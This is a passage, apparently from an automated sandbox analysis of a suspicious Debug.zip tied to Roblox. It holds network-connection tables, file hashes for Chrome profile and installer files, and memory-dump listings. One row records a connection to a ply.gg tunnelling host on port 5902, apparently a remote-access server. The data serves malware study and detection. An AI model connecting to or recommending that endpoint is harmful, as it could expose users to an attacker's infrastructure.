| GB | 92.123.142.97:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.197.79.204.in-addr.arpa | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool-alternatively.gl.at.ply.gg | udp |
| US | 147.185.221.22:5902 | pool-alternatively.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ecsv2.roblox.com | udp |
Files
\??\pipe\crashpad_4528_WRFCVDNUCTVJKBGL
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\Downloads\Debug.zip:Zone.Identifier
| MD5 | d2c252e5031bcfdbbf776ae5669eb36d |
| SHA1 | 9a7ac706206d3655116d94dd7319dc0af9f8e5d5 |
| SHA256 | 277caa73bfa3198fa7fc98435d146f9e58696f5a5312b634541fe5c8175d8588 |
| SHA512 | 7d26deabed154306fa7406332c7b26ac3897026bbf302e1928ad409549173137acd257ff85f4f828486ab14f9dcb1081fd823a9f626a26d6ed39ef8d2e4f351d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | c287104b19fd4c7156ebeef83eaab17c |
| SHA1 | 203d19f243fec1ecbea647dccfe1f8356852689c |
| SHA256 | 96a4a90811bd06f16cc160e90d3e966496fb936119c4d8f8e795d7526c3a198a |
| SHA512 | f332014cbfecd7f28747e74fab0613a19bcdce9a564f4d377f0a49b9cbe9d9bc9c1a66253e6d6dc9373b4492713a1630621b2afc98345bb0a0e2ec14448c881e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 466dde86796a24df949e3f28162b1b33 |
| SHA1 | 77375e1ab101edf88fa4f7139282cd858206f84a |
| SHA256 | 3ba745985d9720e3ae6d586cf513dd72cf09c2f49bc56589b0e475be01d69c72 |
| SHA512 | dbb79be217b3a6d6b2ad77d10a2a2b3db2988d2d1f4fc3f3c4f66ba5a2412d12c14bef5be948a35005663b5733aca51e8a8bbd0a44b290516c70ae7a492545ab |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 7fbd694167795906303d959037965dc6 |
| SHA1 | d48d9996e5406edd1835e67d6b1a7d475e67988f |
| SHA256 | 41007df84f63b4049da14a37ee40ed242fd22426d921260d3f7efbda426ad901 |
| SHA512 | b245d78d52cb73bcbfb220c6b4f51492b4d7766912e643d523112eb912a98881923e66981a4966833b97e51ced0e2645bd2490bba85108af205db3da1f82459b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 33fd9855895e4569eca5f23c16c41f37 |
| SHA1 | 37bcf64ce4f93fe3978fa6140ca77dc5de08fde3 |
| SHA256 | 22c53b7d7c8ace9b2b1939950e152fbd6fa8268056fce20cb64dc54f888727e7 |
| SHA512 | dd436319adf7c201c67419ff32a47e66c01c1f5185579d1bec4c79a70ec5530e72f7df2bd231f1d388d0d704fba9119493b594121a385a3b2d57e783a92f5fb0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | af364337cc44a0dde5ac3e762792efa5 |
| SHA1 | 3d15ff52d2f08b5596b5b2cac4d7260766ad2df7 |
| SHA256 | 6cbf5a2d2871b1b46166b16edd7f9722b1e664cafb757966341a3b591afac82c |
| SHA512 | 1e800ffc0bc32b540d1c5018ae1f89628f8bdb2557065ffff9904d91c6b9d6138351016e46406549c73dfcfa08fabc08b048764e3c89d7920f8f20298a93ba8f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 8e8a884e00bd6b4a8761266fd28ded20 |
| SHA1 | 678f3ef25bf08e05f4bd9e0097331f6772ea2ab6 |
| SHA256 | 56ead3f7963cbb4070be3294c1e1f595f5f129a3730cacd12b543224b478a8dc |
| SHA512 | 39662d9077e0e54fb75e91ef9a7a444a44e9abed4fb4b0e83927b447e455c17b98213fbe99d42d84d344a03ba53948a70541891202be849f89479af73b788ff8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2956b7ee1bf7c3fbe903515d9664f980 |
| SHA1 | 0f7df86ea490b3c36f84fa1836c4129d21be3655 |
| SHA256 | 4ffb47b9793bec2a9e147c5c756a5910ea8bb146ce5d1b5ed7e64d5b62138dcf |
| SHA512 | cfc9c37f1fde9bf6b6d1a5652ae3518f566d0e98f973c5974fa6f9bfdfe7dad75c9523b475d797d1de75b4367f13ccecf3fa5dde3d49c4b65c71251085194900 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 9276cf2067248ae81d1493d66eb3ad3c |
| SHA1 | 9be04e21ae6c03e9f1220a1d4c0c834400bea7e1 |
| SHA256 | 4279958b36056e939e196e2a3a94552e35cc05b2e37ff974d9d4ee2941265e42 |
| SHA512 | dbc63b338d23d7121567910d7bc9fa46b56ace6b30bc9dc72fdd39419aaa011ab2ecde499daaf6cc6180594ba33406a637499e525542f243d79aece1479716b3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | b2f817e8407e200940c4cb64a9c58950 |
| SHA1 | d32fd7c7aeb6f070e2931240cb0efda10982d956 |
| SHA256 | 6ea53b4fe3644162f6922499bf26657bd39fc97c6da82968586d922d992f7d16 |
| SHA512 | b8a9cc793378cdedc7ab19a5055802b109de16ee0e51dcb37e1990181957e937db881050ec79020fa1adb27cefe1c7d746f60bbdf39013ab2a6f083a5f59f06f |
C:\Users\Admin\Downloads\Debug.zip
| MD5 | d60af2d20a44f3597fcacc78da0aadb7 |
| SHA1 | 5392c74c3784fec87a82fbd1a77c464910372ce7 |
| SHA256 | 34e27b44a9e2a95271f5072d3b840673580b09ef6510c9b8169c9a4015e2672d |
| SHA512 | e0a20c724ac7175f51a1e8b4de463bf2036bacacf3cc730b256d019ad1db0bd56518eb672a936fde9cc8524122ed633388984b49caa6c9dea657ce47aefe3e6c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | bf508a9fa72b649f331a9190f93fb7ab |
| SHA1 | 728b7bc3c5ae91b02c22bdf75c6353b9843801d4 |
| SHA256 | b4a9bfecbaf3842a0fdf1aa2f757ca80a17053f260644fbe007c6d5ba8b2b385 |
| SHA512 | de4d13e2c098cd58304e4c2ed1617c07f6e1600809e21cf3488088c8aaa3e882f90d207379581a7636f60748bd935d3c576613b21eba8393d4f506259bfdc31a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | fb6ae53569c35e18f32930aac6abb00a |
| SHA1 | 74e926b24e38d9b01e9642bbd7281b2a45c54a31 |
| SHA256 | afcb86ba453608a8b2ab6f87749cfc1a50f9be08048ce5b2af28d5debc1b3ea3 |
| SHA512 | d20b8403999d16e91ffe73ce304bf5d504c2d90febe394d3fda876416069de92b2f12b89990d219fff788cf5eb6184a3221ba7636603545f73ba9f5417e56d28 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000062
| MD5 | 588ee33c26fe83cb97ca65e3c66b2e87 |
| SHA1 | 842429b803132c3e7827af42fe4dc7a66e736b37 |
| SHA256 | bbc4044fe46acd7ab69d8a4e3db46e7e3ca713b05fa8ecb096ebe9e133bba760 |
| SHA512 | 6f7500b12fc7a9f57c00711af2bc8a7c62973f9a8e37012b88a0726d06063add02077420bc280e7163302d5f3a005ac8796aee97042c40954144d84c26adbd04 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | affd7bb3b5df532e1de0fa80a00df10f |
| SHA1 | 7b31d8984d26e148b2f0fb3af8d73d96acfe0bea |
| SHA256 | e4d02b97a61c76a98bb7ebbbb61a1900ef1b2d1b84e98ed3856d4a8657d38a1d |
| SHA512 | 5fd87f9a5ec53e69c2bd314d6d6279d1d904ccce13a22e3fcca5d85bddd0b22aa81174947002dbec6eea42f8294805ae7b5c186ba1f3af22b00cc3fe15f29b6b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 2f2261072687b89f0be06de88d3c42e4 |
| SHA1 | 2c48c21d3b3faa8e9315b447180cad1ab0e7c1cc |
| SHA256 | ac5c6fae0765c924b049f4a6d163aa4e128a8ebbfbaafbf614ba5b4256e05209 |
| SHA512 | 32ea62390b3241bef4249d9ade39a87f0679500fcc021f89a113f6921d72321e48117e1d828660597bea08cc58f71375f5c727c34e2de4bca2f3b53b2c53bf85 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | bd0d4d5cb75571afc962f2855ae59eb0 |
| SHA1 | 4eb94182c072bc2554fe70f2e248ffee78c6e4ff |
| SHA256 | 1f89b282daa5be9530d9e1955d02606a85ec3dcf06e416fbb078440ee6c2f169 |
| SHA512 | 441b0e4571b722abff5fc4035750e198542bc33f8d2e37c0cce2c00d4ecb2f45248c7c595fd402bc96a9c26fff66440420eade1118683a5e2793d0b2b98b81dc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e241d864acb866c1075f03fa9dab29b8 |
| SHA1 | f593db8eea1186f93e191528522dedb4c2588cc4 |
| SHA256 | dd37bdd11d4b3971c20a6f5678905e51b5f93781746940bc259305bc91091f5e |
| SHA512 | 6f13cc239872bcd6ba6186c4268562977ec779f5a932422ac3f90afa4599077fffc2692dd56aab3118aa8e3fe5835b72949770580ee48505c6252b99b8ed6385 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | f52854b7255d1116845dfbd9eb0f7ba1 |
| SHA1 | 2a0c5edcd465b22397b8c5864ded73743f85e579 |
| SHA256 | b986488aeadf743f8a85952312448cd2a6c7432966ed30052684cee633cb08bd |
| SHA512 | e6185f53fc80ebf0a2378bd1ae9f7ac15767f10c2a1e94fc7a8c80fa2dfa29a8096e9b3f991292071e850eb94e3dfa361039cc44858e211d90558241bc2c15da |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 00e8764807ab157ccd14fa5c5e5b3236 |
| SHA1 | 052632b680bd2bd5eaa29a9cdda04da239507aeb |
| SHA256 | d923cf4bf122d7d06500de8af639de2c0f3c3d05473461f75f9f8e1d7ad85290 |
| SHA512 | 56e7fafc758985c9936dd46da7d5a2ae85e50adc16bd0d2a8619a2d44533a4df204f67ddff49f9cd32d828975c0ea3af0a7938b3aadde3fcf9099c5d7708630f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 4c4144b9fab0032fe123a50b1cd11c31 |
| SHA1 | 44d9c83c3b7cc108da8c0df5813dd693eaad8d55 |
| SHA256 | eec7b3a734cbd5458773ba0020424187a95a6037a97f7ce0bf9479e1088070b4 |
| SHA512 | 2e4f5f7d10f159b358651a8517bc0b3fb7840baca6d6687a8ca8d3073c78587daad15e0942295176288047e1ba2491d7037eb2a8276dc2a768dc62e82e7a968b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 92ffa4412858c90e38016da5e2857cdc |
| SHA1 | 6cdbe1ac1743ebdf19898a0fd698dbafcec171a7 |
| SHA256 | c48de6815f597e9a9b460886a2b8c7b4f8b859c562667cca46322b8ed9b0e83a |
| SHA512 | 56c4c04cb40375b378223437c422bc70eaab96c018d777bdb5868293da5de80b2b0da74dec0ffba023441370e085ca7f7c67f5cc6e48f4e1b026f4e3b1f6331a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1060cb1f5e49490efd11cd2d56d50a57 |
| SHA1 | f5619c08e893a45a7f61d8cc14feb7eb7814b9e4 |
| SHA256 | ba5da71816e268cc27e4a5dedc4c8e74b8fccf4860c7faee85c5f973b7df2a2f |
| SHA512 | 66fe0739699de942c979c4c9e86b42afd4edb9f0d60ea5262303f29001b72b7e32360e1b64e526d1dc3e91877ed656f207dc15857582a75cb5a3666c906aee23 |
memory/5984-934-0x0000000000AE0000-0x0000000000AEC000-memory.dmp
memory/5984-935-0x0000000005A00000-0x0000000005FA6000-memory.dmp
memory/5984-936-0x0000000005450000-0x00000000054E2000-memory.dmp
memory/5984-937-0x0000000005500000-0x000000000550A000-memory.dmp
C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe
| MD5 | 0a4e6d7286b389e2fd93317e27d46585 |
| SHA1 | dcf0d769a94555ce60f1b367b2851477286366be |
| SHA256 | 5853f8b5333a0c7a4fa318e2da1400eb1bbd0a52dc22b5521002066f242a2ac9 |
| SHA512 | b859cac971f414b24ca53832cab53cc4a424b776923d7f7c2c167f2d60c5aefdd4d5aba255af2e1e3673396101b575bc77dedea3ea06060c962863d635b218c9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | fa3347c9a1692d894a40d42a3f79dd3b |
| SHA1 | cf5245a103b6611379d700291131dfeec8ce2e88 |
| SHA256 | 741dedaae70556c15a4501a8825c8083ebe250b13e71f3b2428dd66ae22f6e45 |
| SHA512 | 906f0e71e2b15cdce164cf2ccfdb6e4f3fa058dec163e075526e1df6f86117c0e8e7c8bc2fe00182acddff3fdb343ae4dcc602cd29f5fc01698b8671c00a6064 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | aab1e35d7f4d512dde4637bfb265809b |
| SHA1 | c2c5fbae17c41d61fbfd0d350bc6bb41559b5ee5 |
| SHA256 | 01b7b19639b33218486aca3dc3287dc72b173c731fa2d32546cd9dd7c4b940a8 |
| SHA512 | 8e39f5f8e7bf8f8015b0dce15f0b667f9e0f4279a353cf7b8ee24d0cac25a023d421fa8c6b0534958ef01a8f8365185b26304ee1b4437d14515e2106502a8d2f |
memory/5984-999-0x0000000006920000-0x00000000069D2000-memory.dmp
memory/5984-1000-0x00000000068E0000-0x0000000006902000-memory.dmp
memory/5984-1001-0x0000000008A00000-0x0000000008D57000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f12264432bc6f2b6740ee103f05c458a |
| SHA1 | f9824dcf20f2e17964e4d930ecaf34599c8a8b9a |
| SHA256 | 96da5b4d425b103b6c86432e9a200a9ba594f65a537674e73386ad8365d0a6f2 |
| SHA512 | 0a6024db4955208252a8c529f7e508c5d610c2160b285ed00cc4567268208894037d9a3bc0b0220466ed2ad297ddfc60e74349df781a74f7ee85495a41d15e8e |
C:\Users\Admin\AppData\Local\Roblox\Downloads\roblox-player\2eaaec627d05c9a36db0a75f68c21272
| MD5 | 2eaaec627d05c9a36db0a75f68c21272 |
| SHA1 | 9c123e54b8fed65b0c768c1e248a3ae78964f625 |
| SHA256 | 18eaeff48f24edc79f4b81a3d5d74644ba8e57653c3ce0a30bc15df917964452 |
| SHA512 | cddd4bf4c19dfaf39e97b65ffb20094210e53aee9d48a6785e104d8d71de39ee8d9faac247100f5c867edc65294df546082de692ae7fb00a89c711e63cd36d5a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e7f18705097c0f03da657c42cc5d6f1f |
| SHA1 | 08b68a8185d7e8ebfcf5c6af467c25694d0f1a6b |
| SHA256 | 6a029f128dcdfe0a71a90cd56aa49f2106fd7c7ac2ecdf115b74a5cce5091c65 |
| SHA512 | f86f421895d3131a622b48c600f4fea4989e2275075c66dde39da64553fde0761509f2915f17f204f9a4aca91b83e5e3a942fab557a0234e02616991787d9988 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 7797b3a194426c33869299baf17bd519 |
| SHA1 | bb1773ca76ff53ffaa2a4748df40c51211c6cdad |
| SHA256 | c56fd7a4b0edefd0f7ed49220187479e1b4a024a2b454489bcad9fd8e98e9afa |
| SHA512 | 12fc357fbc4abb239323d9c6abea6a2b1559f9b899d6058c25bf3d509d2fe0c0ad20fc207c36469f66639c40df91aa3bb82401cb06c362b6809883e5c3048bf6 |
C:\Users\Admin\AppData\Local\Roblox\Downloads\roblox-player\5b6171c8dbb01d6bff4fbe433ef7134e
| MD5 | 5b6171c8dbb01d6bff4fbe433ef7134e |
| SHA1 | 402261ab9ede4118da88e15a977e48b06138f9f8 |
| SHA256 | b693b5678a7ea4620b1a3959ecf9c4864fad30ce9e2b195433fef28c296aff72 |
| SHA512 | ab108c6890bc4ce5956bb019f339c07d0bca7a998ffe09015a177bc3575ff847f36fd2e1123c713d99131d60a4b27323db911a2bc9fba8b7339f98a2c340ee30 |
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
| MD5 | 4dc57ab56e37cd05e81f0d8aaafc5179 |
| SHA1 | 494a90728d7680f979b0ad87f09b5b58f16d1cd5 |
| SHA256 | 87c6f7d9b58f136aeb33c96dbfe3702083ec519aafca39be66778a9c27a68718 |
| SHA512 | 320eeed88d7facf8c1f45786951ef81708c82cb89c63a3c820ee631c52ea913e64c4e21f0039c1b277cfb710c4d81cd2191878320d00fd006dd777c727d9dc2b |
C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log
| MD5 | c3936057e54a8cb5aad83d0fd017e013 |
| SHA1 | c7fed04af6086411754f10369906bce4fb79505a |
| SHA256 | fa34d985c5da71e913ca75c45f945adc1bcd1710a53f762271fbc91fb310a233 |
| SHA512 | e05a9cd1cc4eb59cd9b7b10063e086bded92ebab2e699f8e35f63d1009fae263f06b993f405095674001f0190525948035a5bd3bca80737a3bc76a237b886996 |
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
| MD5 | d222b77a61527f2c177b0869e7babc24 |
| SHA1 | 3f23acb984307a4aeba41ebbb70439c97ad1f268 |
| SHA256 | 80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747 |
| SHA512 | d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff |
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | b5ad5caaaee00cb8cf445427975ae66c |
| SHA1 | dcde6527290a326e048f9c3a85280d3fa71e1e22 |
| SHA256 | b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8 |
| SHA512 | 92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f |
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 3be8f89a45e311a64df6a66d5025405a |
| SHA1 | f26b695b67c484d963ee9f165546da76bee4cbb9 |
| SHA256 | e186dcfbc2159646d41f16009a0bfe2dacb7f27eec3d474bceeb9a8ad8209983 |
| SHA512 | 8abbac081925ff61441b20e515e1c537083be977d7cb8e99ba80656cb1ff74a676c87b996286ef5255e004bcca7bf5d294ff3996f1e03d37692db2fbe0ad8bbe |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 543f17fbfc982ab646f600e10993a20e |
| SHA1 | d87d58483838d808644bcb2897c83ffbbf4280ba |
| SHA256 | 8cfc85d73d262b095b0477dd85a3f2bcb8495d0139980fc3c218ba2b028054c3 |
| SHA512 | 34a6f335b11438ee5d863dfb2cb61306a7df9a6920b340338248de4f6e5115e3e91f652defb3ebcecc69ce4e3aec9ba55d5089e49180c8833d740c0fdbb7a2f1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 207610ca0011056bcc43dfb28d4072b7 |
| SHA1 | 085771a075d938e5d338169cce25d6fb56a36a08 |
| SHA256 | b7351a63120b87ebcb5ae12fb2ef7b4483a2ff17484dcfde85af590fa9c07ceb |
| SHA512 | 5ab0f00c5e5b87653f1444c7bcc702be8374c80afb6d683c6ebf67d64471a8732bfd352e02e0eef607669ee00a319b3c2a0a8e2a609419c35030b3ad039296ee |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9ca421cba2b150527dc0e672396ae598 |
| SHA1 | faffc7a49d26392dbb94eb8a0ef377a1f322e5b0 |
| SHA256 | ec2bd705e330733c39a1aab659a61810d4a7e493de33a57a4ebc62943f7145bb |
| SHA512 | ba8095d69fee4830b32ff6e6c16f11f4ec9aeb6aa624d50f9ec034339929a0d9aa4b4246fec8d5670eab5ae3a8a5f32da3a54de826faedfabcc000ca310cafae |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 94675344ec55b51519b54cfa5db1d948 |
| SHA1 | c3235cf9297bcd096262c0cf5ad0004797716d7b |
| SHA256 | a34817fb391cd6abd4e9de9a945972a1f0e76c1f2597678e535c817214f48dbe |
| SHA512 | f7425c26b2b7a5a530b25f965742d37d30dea649abb0d0f2f51f37cf054d4a50eb134eb94fba9c661aceff362cce36705645311af910fc0ee7399dcb20e5e00e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 137f783c305450ad7e5e1330ff3abee8 |
| SHA1 | 30ad4eb65d97871e507e7b7038bb4cd17ee25fb3 |
| SHA256 | 2642042d4c630c523c70ebbbc24bd93f9dc377c004ae03375a412900af7f5398 |
| SHA512 | cd74978ff48bd8c8c4f2845e6b6669fe1a71897c373d2fbce66de7df8fdfb436a94c86b9997793617d9fbc5ead988a189fef3e7e067ad7ecdbafd2b4a17a9e89 |
C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat
| MD5 | c9969ce2737e3f47a27f97c65fea8bd9 |
| SHA1 | 8bed747b7b41e318ace15ee700903b6f3a4b9f41 |
| SHA256 | 090c23a96fe01e10cde21fd69ff8cb631092597f967d6c5029fd24a1358f414d |
| SHA512 | 1360d8fefe9ec4284337be195203a38adf2aaf133a16493654ea7bc5cc9c03f76f720a2bf8ef73920d7e73343c827d19a5c15c170ef5618eba76ae8fd65bd3da |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ecf60bc433bdbe842632a291956175c1 |
| SHA1 | f8c8e168413a2c0ff1debc1234c3659e21cd3528 |
| SHA256 | 771e4140c829e975a13df0effe3bd8df6ca95c71aedf68ab2ae8c7993818e527 |
| SHA512 | 10ea1beb1a57df824535567549e613150e74970ad52661ada7cd41f6759090216c666225696b54d25c282d9fef65e7f236e03286dfa8498f558f3ce83a7f3800 |
C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\Installer\setup.exe
| MD5 | 11a19165aa72e46ad47200ca46760c87 |
| SHA1 | 2fe4616eadaf543846571564ca325e772ea5375c |
| SHA256 | eaac114b05373d005f91c2824c3b907d01842056468018b95a688e82ffcc95b1 |
| SHA512 | 5b4074ba1598c7441fd3dffed54cf0cea540a8e58ace339254b9a29bd6709a8e64458c10e9797a75ba8e0e84566e8c5935bf4891b0115dc02017396d70f47b27 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0bbbf165deffc7c0ab27dacb910eaf1b |
| SHA1 | b47caefe4e1a6d690b822b7cbe7211ef3cec1b7c |
| SHA256 | 4d085332c9502df73602fa04c066901817709c26ffc570a3efe6f5174757b934 |
| SHA512 | 0353f5653481c3aa6a693e8f2b18df18c70e4de34a61a8772d4afeaa55aeb441086a3afa6bd55c24f07ab21e5c38fdae17f19509fc1ae3f44541c12b25cc1ade |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d15cffc684669685cf2d254bea3f982c |
| SHA1 | d6eb4d8fe49e3ef0bced8be2ea3c1fc022ba1201 |
| SHA256 | 4099fbad2a9a670b0df10c856cf5c78230bf55851d016500163e01530d521aa1 |
| SHA512 | e7a9219ac0814de9345976024b89b2bf2e4b717607d956f0914773911cd6f5c7e140fa5f86363fa5de2e27eb48aa73a9fc0f201a084e02af353bfcd82953317f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 28183b768120e83b652f54bed8368c85 |
| SHA1 | fd79d764ad4f70bb7d7390c97952b3d5952cb468 |
| SHA256 | 1914e5434fec20fb143a13d1eb4bb17b2bf58c04c5a975f5fd02cb47e82b4b38 |
| SHA512 | ac057a101a8351aec0fe8ac45a3a703e4403fcf83ebdf9e22f158a04cda41fa0728070e7f24ab45e6b596f325ed4fa2ef44fd148bf760d75db63583bc1367efb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 6e1b9d8fe70cd815fab8f123e2bbb989 |
| SHA1 | fa1c8394a974e41586c943678323900406fb1d42 |
| SHA256 | 59eaccdc27c60bf9c807f56f5d44f32cbbf7500e542096ae965113b8d4d6b33b |
| SHA512 | db347f2c142aad7594bafdfb993ad2453b35ecef024718c6a7a795662a1beb8afb6d026c5b77d46af2ba4eb00c765199e6bfb172686221fdf5390c14595c56a7 |
memory/432-1345-0x0000000000A60000-0x0000000000A95000-memory.dmp
memory/6468-1350-0x00007FFDA8240000-0x00007FFDA8250000-memory.dmp
memory/6468-1356-0x00007FFDA83B0000-0x00007FFDA83E0000-memory.dmp
memory/6468-1359-0x00007FFDA8440000-0x00007FFDA8449000-memory.dmp
memory/6468-1358-0x00007FFDA83B0000-0x00007FFDA83E0000-memory.dmp
memory/6468-1357-0x00007FFDA83B0000-0x00007FFDA83E0000-memory.dmp
memory/6468-1369-0x00007FFDA64B0000-0x00007FFDA64BC000-memory.dmp
memory/6468-1379-0x00007FFDA5CD0000-0x00007FFDA5CE0000-memory.dmp
memory/6468-1412-0x00007FFDA83B0000-0x00007FFDA83E0000-memory.dmp
memory/6468-1411-0x00007FFDA8230000-0x00007FFDA8231000-memory.dmp
memory/6468-1410-0x00007FFDA5F20000-0x00007FFDA5F46000-memory.dmp
memory/6468-1409-0x00007FFDA5F20000-0x00007FFDA5F46000-memory.dmp
memory/6468-1408-0x00007FFDA5F20000-0x00007FFDA5F46000-memory.dmp
memory/6468-1407-0x00007FFDA5F20000-0x00007FFDA5F46000-memory.dmp
memory/6468-1406-0x00007FFDA5F20000-0x00007FFDA5F46000-memory.dmp
memory/6468-1405-0x00007FFDA5E50000-0x00007FFDA5E70000-memory.dmp
memory/6468-1404-0x00007FFDA5E50000-0x00007FFDA5E70000-memory.dmp
memory/6468-1403-0x00007FFDA5E50000-0x00007FFDA5E70000-memory.dmp
memory/6468-1402-0x00007FFDA5E50000-0x00007FFDA5E70000-memory.dmp
memory/6468-1401-0x00007FFDA5E50000-0x00007FFDA5E70000-memory.dmp
memory/6468-1400-0x00007FFDA5E20000-0x00007FFDA5E30000-memory.dmp
memory/6468-1399-0x00007FFDA5E20000-0x00007FFDA5E30000-memory.dmp
memory/6468-1398-0x00007FFDA5D10000-0x00007FFDA5D20000-memory.dmp
memory/6468-1397-0x00007FFDA5D10000-0x00007FFDA5D20000-memory.dmp
memory/6468-1396-0x00007FFDA6750000-0x00007FFDA6759000-memory.dmp
memory/6468-1395-0x00007FFDA6750000-0x00007FFDA6759000-memory.dmp
memory/6468-1394-0x00007FFDA6750000-0x00007FFDA6759000-memory.dmp
memory/6468-1393-0x00007FFDA6750000-0x00007FFDA6759000-memory.dmp
memory/6468-1392-0x00007FFDA6750000-0x00007FFDA6759000-memory.dmp
memory/6468-1391-0x00007FFDA6730000-0x00007FFDA6740000-memory.dmp
